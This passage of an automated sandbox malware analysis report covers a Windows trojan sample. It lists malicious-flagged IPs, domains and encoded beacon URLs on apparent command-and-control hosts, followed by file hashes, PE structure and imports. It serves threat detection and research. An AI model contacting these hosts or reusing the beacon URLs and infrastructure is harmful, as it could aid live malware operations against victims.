                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.sakkal.comexplorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown

                                                                    Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.161.84.100
                                                                    		www.ronwongart.comUnited States
                                                                    		53755IOFLOODUStrue
                                                                    94.46.9.37
                                                                    		generalflix.comSweden
                                                                    		200719MISSDOMAINSEtrue
                                                                    199.59.242.153
                                                                    		www.addthat.xyzUnited States
                                                                    		395082BODIS-NJUStrue
                                                                    198.185.159.144
                                                                    		ext-cust.squarespace.comUnited States
                                                                    		53831SQUARESPACEUSfalse
                                                                    34.102.136.180
                                                                    		foodsystemsjusticeproject.comUnited States
                                                                    		15169GOOGLEUSfalse
                                                                    193.168.194.206
                                                                    		batiktintaemas.comGermany
                                                                    		47583AS-HOSTINGERLTtrue
                                                                    85.159.66.93
                                                                    		natroredirect.natrocdn.comTurkey
                                                                    		34619CIZGITRtrue
                                                                    104.160.174.177
                                                                    		l.17986.netUnited States
                                                                    		46844ST-BGPUStrue

                                                                    General Information

                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                    Analysis ID:383936
                                                                    Start date:08.04.2021
                                                                    Start time:12:45:00
                                                                    Joe Sandbox Product:CloudBasic
                                                                    Overall analysis duration:0h 9m 18s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:light
                                                                    Sample file name:RCS76393.exe
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                    Number of analysed new started processes analysed:26
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@7/0@12/8
                                                                    EGA Information:Failed
                                                                    HDC Information:
                                                                    • Successful, ratio: 30.7% (good quality ratio 27.9%)
                                                                    • Quality average: 71.8%
                                                                    • Quality standard deviation: 31.6%
                                                                    HCA Information:
                                                                    • Successful, ratio: 94%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    Warnings:
                                                                    Show All
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                    • TCP Packets have been reduced to 100
                                                                    • Excluded IPs from analysis (whitelisted): 20.82.210.154, 13.64.90.137, 204.79.197.200, 13.107.21.200, 23.54.113.53, 40.88.32.150, 104.43.139.144, 52.255.188.83, 20.50.102.62, 23.10.249.43, 23.10.249.26, 23.0.174.200, 23.0.174.185, 52.155.217.156, 20.54.26.129, 95.100.54.203
                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383936/sample/RCS76393.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    94.46.9.3746578-TR.exeGet hashmaliciousBrowse
                                                                    • www.generalflix.com/goei/?jBZx=D8b4q&kfOdRJ=J0lLVS/Rsi+YHyEfH1lEi6uDJp6jlcrDbJWYwp45E+lX6ClWTYpIvdMi/PcVRsXJUcC9
                                                                    199.59.242.153PaymentAdvice.exeGet hashmaliciousBrowse
                                                                    • www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m
                                                                    0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                    • www.mybodtonheart.com/bei3/?8p=EZa0cv&2d=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzOxundmeb0pk/R87Q==
                                                                    RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                    • www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3
                                                                    New Order.exeGet hashmaliciousBrowse
                                                                    • www.friendsed.com/ditf/?KvZpwPd=7CjyIVchQZXwoSp1jc0tC17NVLbOMlIdjZlIPcHCPGe34LEeqGe9fWkqZA8O62TU4Lu3&ARn=BjAtCdjxOrQ8pTgP
                                                                    ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                    • www.simplyhealrhcareplans.com/sqra/?Rl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK&_jqT2L=gBg8BF3ptlc
                                                                    payment.exeGet hashmaliciousBrowse
                                                                    • www.mybodtonheart.com/bei3/?M4YDYvh=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzCIiGxmJdo4&Rl=M48tiJch
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • www.getbacklink.net/cugi/?BlL=15D5Rlw69THVEJtjRVEnjixvCWz0IM/dTd5neGnMhVDDO36KfpjGt1+SA4NLCUy6JvG/&EZXpx6=tXExBh8PdJwpH
                                                                    PaymentInvoice.exeGet hashmaliciousBrowse
                                                                    • www.sgdivergence.com/c22b/?9rgH70GX=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&LL0=X4XDHNl0z
                                                                    SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                    • www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut
                                                                    swift_76567643.exeGet hashmaliciousBrowse
                                                                    • www.hicapitolize.com/m8es/?CVJ=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725wPxuv0KtT&oX9=Txo8ntB0WBsp
                                                                    Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                    • www.tollisenschool.com/g7b/?RzulnV=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBHbOqrlPmt&QL3=tTypTNm0gPD0F
                                                                    2021-04-01.exeGet hashmaliciousBrowse
                                                                    • www.tollisenschool.com/g7b/?o2=iL30VlAxs&8pntMJ6P=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqlghXUv6T7qPq
                                                                    onbgX3WswF.exeGet hashmaliciousBrowse
                                                                    • www.sgdivergence.com/c22b/?w6=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&1b=W6O4DXSP5
                                                                    ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                    • www.bootstrapexpress.com/aqu2/?rPj0Qr6=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYIns7fxRpg&tXrx=gdkpfvSpm
                                                                    Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                    • www.simplyhealrhcareplans.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
                                                                    PO.1183.exeGet hashmaliciousBrowse
                                                                    • www.dentalenhancments.com/god/?XDKPxrlh=EnxYEfX2deexTb058Y7c97BLkeqRbsEiixp341UOoiLWyojMB+48BbQ1WdyM7J0osU9+&anM=LjfLu4hPXh18f
                                                                    Scan-45679.exeGet hashmaliciousBrowse
                                                                    • www.wwwrigalinks.com/gwam/?Bjq=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Efzxz2=2dut_L3xNbOxThN
                                                                    TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                    • www.creditcorecard.com/ihmh/?wP9=1bJfls8sWvOO1f7Vh8wqJhCF9whiFTpEYoud4iYCKocbr8IRO//r9FkTIR4//YxGu1lm&lZQ=7nbLunBhP
                                                                    DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                    • www.atualizacao.net/vsk9/?GFQH8=DklfZSbfSG8rWu2eKGFDH5WZs9/qq3j2XcYy6rNlSIz25CVNqPMMuncxEVlgc+oIXeWq&llsp=gTULpTwpERQd0J
                                                                    9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                    • www.bootstrapexpress.com/aqu2/?5j=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYi4cLf1Thg&_P=2dhtaH9

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    l.17986.netSpare Parts Request MV Accord 8.13.20_pdf.exeGet hashmaliciousBrowse
                                                                    • 64.32.28.253
                                                                    natroredirect.natrocdn.comnewordermx.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    Swift001_jpg.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    t3R3C0QGKU.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    PO_210301.exe.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    PO_210224.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    VESSEL SPECIFICATION 2021.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    Y75vU558UfuGbzM.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    D0ck7nuQyqLXPRQ.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    RFQ.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    bz3xMPgqmD5nAxW.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    kaExkIZiT6.exeGet hashmaliciousBrowse
                                                                    • 85.159.66.93
                                                                    ext-cust.squarespace.comPO4308.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PO#41000055885.exeGet hashmaliciousBrowse
                                                                    • 198.49.23.144
                                                                    SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    invoice bank.xlsxGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    UAE MINISTRY OF HEALTH MEDICAL EQUIPMENT SUPPLY TENDER.exeGet hashmaliciousBrowse
                                                                    • 198.49.23.144
                                                                    Scan copy 24032021_jpeg.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    PO032321.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    Copia De Pago_pdf.exeGet hashmaliciousBrowse
                                                                    • 198.49.23.145
                                                                    V90Y4n0acH.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.145
                                                                    Dgm2Yseey2.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    winlog.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    payment slip_pdf.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.144
                                                                    wFzMy6hehS.exeGet hashmaliciousBrowse
                                                                    • 198.49.23.145
                                                                    INCHAP_Invoice_21.xlsxGet hashmaliciousBrowse
                                                                    • 198.49.23.145
                                                                    ffOWE185KP.exeGet hashmaliciousBrowse
                                                                    • 198.49.23.145
                                                                    q9xB9DE3RA.exeGet hashmaliciousBrowse
                                                                    • 198.49.23.144
                                                                    NdxPGuzTB9.exeGet hashmaliciousBrowse
                                                                    • 198.185.159.145
                                                                    pfjgWtj6ms.exeGet hashmaliciousBrowse
                                                                    • 198.49.23.144
                                                                    Order 8953-PDF.exeGet hashmaliciousBrowse
                                                                    • 198.49.23.144

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    IOFLOODUSBetaling_advies.exeGet hashmaliciousBrowse
                                                                    • 107.178.109.19
                                                                    Statement of Account.xlsxGet hashmaliciousBrowse
                                                                    • 23.226.65.187
                                                                    Invoice.xlsxGet hashmaliciousBrowse
                                                                    • 23.226.65.187
                                                                    MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                    • 104.161.56.143
                                                                    New Order.xlsxGet hashmaliciousBrowse
                                                                    • 104.161.29.174
                                                                    AAXIFJn78w.exeGet hashmaliciousBrowse
                                                                    • 23.226.65.187
                                                                    Debt-Details-1078370504-03052021.xlsGet hashmaliciousBrowse
                                                                    • 107.178.101.181
                                                                    Debt-Details-1078370504-03052021.xlsGet hashmaliciousBrowse
                                                                    • 107.178.101.181
                                                                    6a0000.exeGet hashmaliciousBrowse
                                                                    • 162.213.211.87
                                                                    Payment.xlsxGet hashmaliciousBrowse
                                                                    • 104.161.84.118
                                                                    Scan #84462.xlsmGet hashmaliciousBrowse
                                                                    • 107.178.101.185
                                                                    9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                                    • 104.161.84.118
                                                                    PO 9494843.xlsxGet hashmaliciousBrowse
                                                                    • 104.161.84.118
                                                                    shipment document pdf.exeGet hashmaliciousBrowse
                                                                    • 23.226.65.211
                                                                    Swift_Payment_jpeg.exeGet hashmaliciousBrowse
                                                                    • 107.189.162.104
                                                                    ORDER pdf.exeGet hashmaliciousBrowse
                                                                    • 23.226.65.211
                                                                    Detailed #460988.xlsmGet hashmaliciousBrowse
                                                                    • 107.178.101.250
                                                                    Detailed #460988.xlsmGet hashmaliciousBrowse
                                                                    • 107.178.101.250
                                                                    Detailed #460988.xlsmGet hashmaliciousBrowse
                                                                    • 107.178.101.250
                                                                    Invoice pdf.exeGet hashmaliciousBrowse
                                                                    • 23.226.65.211
                                                                    MISSDOMAINSE46578-TR.exeGet hashmaliciousBrowse
                                                                    • 94.46.9.37
                                                                    MV Sky Marine.xlsxGet hashmaliciousBrowse
                                                                    • 94.46.58.25
                                                                    4TYyYEdhtj.exeGet hashmaliciousBrowse
                                                                    • 94.46.58.25
                                                                    MV Sky Marine_pdf.exeGet hashmaliciousBrowse
                                                                    • 94.46.58.25
                                                                    z2xQEFs54b.exeGet hashmaliciousBrowse
                                                                    • 185.76.64.223
                                                                    3yhnaDfaxn.exeGet hashmaliciousBrowse
                                                                    • 185.76.64.223
                                                                    BODIS-NJUSPaymentAdvice.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    New Order.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    payment.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    PaymentInvoice.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    swift_76567643.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    2021-04-01.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    onbgX3WswF.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    PO.1183.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    Scan-45679.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    DK Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153
                                                                    9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                    • 199.59.242.153

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    No created / dropped files found

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):6.958502033101644
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                    • Clipper DOS Executable (2020/12) 0.02%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • VXD Driver (31/22) 0.00%
                                                                    File name:RCS76393.exe
                                                                    File size:386560
                                                                    MD5:1ab1c3129fa0764ea0702da70f3ef569
                                                                    SHA1:ee8cd1946b58390f4599056df1472d01cf85a543
                                                                    SHA256:5d1870672eff4e2ec6d699d654d5268051f7a56f8ca991fefa538eeef380a89c
                                                                    SHA512:58bb904dc8d4435e232936f2972037dbf8b214559d0156c5d5275fdc3547a25e7ce92910459cd7f5c737641df74078e7060f0825df79b99203c2fb5033a0501c
                                                                    SSDEEP:6144:jK3TcyLImYxn3QDQEachg1e4VqOWB4hqynGEpNA:jK3Td093QDQEachGeZ8Gs2
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L..."Z.^...........

                                                                    File Icon

                                                                    Icon Hash:8692f0c4c4ccb2ce

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4041a3
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5EE25A22 [Thu Jun 11 16:21:54 2020 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:0
                                                                    File Version Major:5
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:9c90aa63bb435d1aab6db36d5bf4ee01

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007F1EB8BC4ECDh
                                                                    jmp 00007F1EB8BBD9BEh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    test ecx, 00000003h
                                                                    je 00007F1EB8BBDB66h
                                                                    mov al, byte ptr [ecx]
                                                                    add ecx, 01h
                                                                    test al, al
                                                                    je 00007F1EB8BBDB90h
                                                                    test ecx, 00000003h
                                                                    jne 00007F1EB8BBDB31h
                                                                    add eax, 00000000h
                                                                    lea esp, dword ptr [esp+00000000h]
                                                                    lea esp, dword ptr [esp+00000000h]
                                                                    mov eax, dword ptr [ecx]
                                                                    mov edx, 7EFEFEFFh
                                                                    add edx, eax
                                                                    xor eax, FFFFFFFFh
                                                                    xor eax, edx
                                                                    add ecx, 04h
                                                                    test eax, 81010100h
                                                                    je 00007F1EB8BBDB2Ah
                                                                    mov eax, dword ptr [ecx-04h]
                                                                    test al, al
                                                                    je 00007F1EB8BBDB74h
                                                                    test ah, ah
                                                                    je 00007F1EB8BBDB66h
                                                                    test eax, 00FF0000h
                                                                    je 00007F1EB8BBDB55h
                                                                    test eax, FF000000h
                                                                    je 00007F1EB8BBDB44h
                                                                    jmp 00007F1EB8BBDB0Fh
                                                                    lea eax, dword ptr [ecx-01h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-02h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-03h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    lea eax, dword ptr [ecx-04h]
                                                                    mov ecx, dword ptr [esp+04h]
                                                                    sub eax, ecx
                                                                    ret
                                                                    mov edi, edi
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 20h
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    push esi
                                                                    push edi
                                                                    push 00000008h
                                                                    pop ecx
                                                                    mov esi, 03DAD300h
                                                                    lea edi, dword ptr [ebp-20h]
                                                                    rep movsd
                                                                    mov dword ptr [ebp-08h], eax
                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                    pop edi
                                                                    mov dword ptr [ebp-04h], eax
                                                                    pop esi
                                                                    test eax, eax
                                                                    je 00007F1EB8BBDB4Eh
                                                                    test byte ptr [eax], 00000008h
                                                                    je 00007F1EB8BBDB49h
                                                                    mov dword ptr [ebp+00h], 00000000h

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x39b18a00x67.new
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x39b0d840x3c.new
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x39b20000x2ca0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x39b50000x1a9c.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39afa580x40.new
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x39ad0000x1e8.new
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x4ab430x4ac00False0.740110263378data7.49545295007IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .data0x4c0000x395d2880x1c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .jidiy0x39aa0000x10x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .wahe0x39ab0000x11790x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .new0x39ad0000x49070x4a00False0.372096706081data5.4613035653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x39b20000x2ca00x2e00False0.558848505435data5.00204478072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x39b50000x99180x9a00False0.146027800325data1.75035156037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_CURSOR0x39b34980x134data
                                                                    RT_ICON0x39b23a00x10a8data
                                                                    RT_STRING0x39b37b80x148data
                                                                    RT_STRING0x39b39000x304data
                                                                    RT_STRING0x39b3c080x510data
                                                                    RT_STRING0x39b41180x502data
                                                                    RT_STRING0x39b46200x424data
                                                                    RT_STRING0x39b4a480xe6data
                                                                    RT_STRING0x39b4b300x16edata
                                                                    RT_ACCELERATOR0x39b34600x18data
                                                                    RT_GROUP_CURSOR0x39b35d00x14Lotus unknown worksheet or configuration, revision 0x1
                                                                    RT_GROUP_ICON0x39b34480x14data
                                                                    RT_VERSION0x39b35e80x1d0data
                                                                    None0x39b34780xadata
                                                                    None0x39b34880xadata

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllHeapReAlloc, RemoveVectoredExceptionHandler, EnumDateFormatsExW, FindResourceExW, WriteConsoleOutputCharacterA, LoadResource, SetWaitableTimer, GetCurrentProcess, HeapFree, GetModuleHandleExW, GlobalLock, CancelWaitableTimer, LockFile, SetTapeParameters, GetModuleHandleW, EnumCalendarInfoExW, TzSpecificLocalTimeToSystemTime, GetLocaleInfoW, GetSystemTimeAdjustment, InterlockedPopEntrySList, GetFileAttributesA, GetCompressedFileSizeA, GetTimeZoneInformation, GetEnvironmentVariableA, DisconnectNamedPipe, VirtualUnlock, GetConsoleAliasesW, GetProcAddress, GetAtomNameA, LocalAlloc, AddAtomA, GlobalFindAtomW, GlobalUnWire, lstrcatW, FatalExit, GetFileTime, GetConsoleCursorInfo, LocalFree, LCMapStringW, SetEnvironmentVariableA, CompareStringW, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, GetLastError, EnterCriticalSection, LeaveCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FatalAppExitA, VirtualAlloc, MultiByteToWideChar, CloseHandle, CreateFileA, InitializeCriticalSectionAndSpinCount, HeapSize, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, FlushFileBuffers, ReadFile, 